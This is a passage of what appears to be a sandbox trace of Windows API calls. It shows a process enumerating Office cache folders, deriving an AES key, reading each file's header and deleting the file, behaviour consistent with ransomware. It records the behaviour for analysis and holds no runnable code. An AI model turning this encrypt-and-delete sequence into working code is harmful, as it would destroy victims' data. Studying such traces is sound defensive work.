phKey=0x326bfe4*=0x284d568) returned 1 [0123.964] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x263400 [0123.964] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0124.255] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0124.255] CryptDestroyKey (hKey=0x284d568) returned 1 [0124.255] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0124.256] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 1 [0124.259] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0124.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OneNoteMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteMUI.xml", lpUsedDefaultChar=0x0) returned 15 [0124.260] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0124.260] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0124.260] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0124.260] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0124.261] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x646 [0124.261] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0124.379] CryptDestroyHash (hHash=0x284d528) returned 1 [0124.379] CryptDestroyKey (hKey=0x284d568) returned 1 [0124.379] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0124.380] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0124.381] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0124.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OnoteLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnoteLR.cab", lpUsedDefaultChar=0x0) returned 12 [0124.382] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0124.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0124.382] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0124.382] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0124.382] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0124.382] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0124.383] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7c4 [0124.383] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0124.397] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0124.397] CryptDestroyKey (hKey=0x284d568) returned 1 [0124.397] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0124.398] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0124.399] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0124.399] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0124.399] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0124.420] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0124.420] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0124.420] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0124.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProjectMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectMUI.msi", lpUsedDefaultChar=0x0) returned 15 [0124.421] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0124.422] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0124.422] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0124.422] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0124.422] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x265400 [0124.422] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0124.922] CryptDestroyHash (hHash=0x284d528) returned 1 [0124.922] CryptDestroyKey (hKey=0x284d568) returned 1 [0124.922] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0124.923] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 1 [0124.926] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0124.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProjectMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectMUI.xml", lpUsedDefaultChar=0x0) returned 15 [0124.967] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0124.968] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0124.968] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0124.968] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0124.968] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5ac [0124.968] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0125.012] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0125.013] CryptDestroyKey (hKey=0x284d568) returned 1 [0125.013] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0125.014] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0125.015] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0125.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProjLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjLR.cab", lpUsedDefaultChar=0x0) returned 11 [0125.015] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0125.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0125.016] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0125.016] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0125.016] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0125.016] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0125.016] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x750 [0125.016] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0125.027] CryptDestroyHash (hHash=0x284d528) returned 1 [0125.027] CryptDestroyKey (hKey=0x284d568) returned 1 [0125.027] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0125.028] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0125.029] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0125.029] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0125.030] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0125.041] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0125.041] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0125.041] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0125.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GrooveLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLR.cab", lpUsedDefaultChar=0x0) returned 13 [0125.041] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0125.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GrooveMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveMUI.msi", lpUsedDefaultChar=0x0) returned 14 [0125.041] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0125.042] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0125.042] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0125.042] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0125.042] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x264400 [0125.042] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0126.125] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0126.125] CryptDestroyKey (hKey=0x284d568) returned 1 [0126.125] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0126.126] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 1 [0126.130] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GrooveMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveMUI.xml", lpUsedDefaultChar=0x0) returned 14 [0126.133] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0126.134] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0126.134] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0126.134] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0126.134] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x391 [0126.134] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0126.154] CryptDestroyHash (hHash=0x284d528) returned 1 [0126.154] CryptDestroyKey (hKey=0x284d568) returned 1 [0126.154] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0126.155] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0126.156] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0126.156] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0126.157] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0126.157] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0126.157] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0126.157] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5ac [0126.157] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0126.174] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0126.174] CryptDestroyKey (hKey=0x284d568) returned 1 [0126.174] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0126.175] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0126.176] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0126.176] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0126.176] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0126.194] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0126.194] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.194] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.195] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0126.195] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0126.195] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0126.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwintl20.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwintl20.dll", lpUsedDefaultChar=0x0) returned 13 [0126.195] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0126.195] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0126.195] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="branding.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="branding.xml", lpUsedDefaultChar=0x0) returned 13 [0126.196] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0126.197] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0126.197] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0126.197] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0126.197] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x91975 [0126.197] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0126.288] CryptDestroyHash (hHash=0x284d528) returned 1 [0126.288] CryptDestroyKey (hKey=0x284d568) returned 1 [0126.288] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0126.289] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0126.294] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DW20.EXE", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DW20.EXE", lpUsedDefaultChar=0x0) returned 9 [0126.294] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwdcw20.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwdcw20.dll", lpUsedDefaultChar=0x0) returned 12 [0126.295] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwtrig20.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwtrig20.exe", lpUsedDefaultChar=0x0) returned 13 [0126.295] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Microsoft.VC90.CRT.manifest", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.VC90.CRT.manifest", lpUsedDefaultChar=0x0) returned 28 [0126.295] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msvcr90.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr90.dll", lpUsedDefaultChar=0x0) returned 12 [0126.295] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeLR.cab", lpUsedDefaultChar=0x0) returned 13 [0126.295] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeMUI.msi", lpUsedDefaultChar=0x0) returned 14 [0126.295] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0126.296] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0126.296] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0126.296] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0126.296] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x387e00 [0126.296] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0126.794] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0126.794] CryptDestroyKey (hKey=0x284d568) returned 1 [0126.794] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0126.796] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 1 [0126.800] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeMUI.xml", lpUsedDefaultChar=0x0) returned 14 [0126.801] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0126.801] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0126.801] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0126.801] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0126.801] 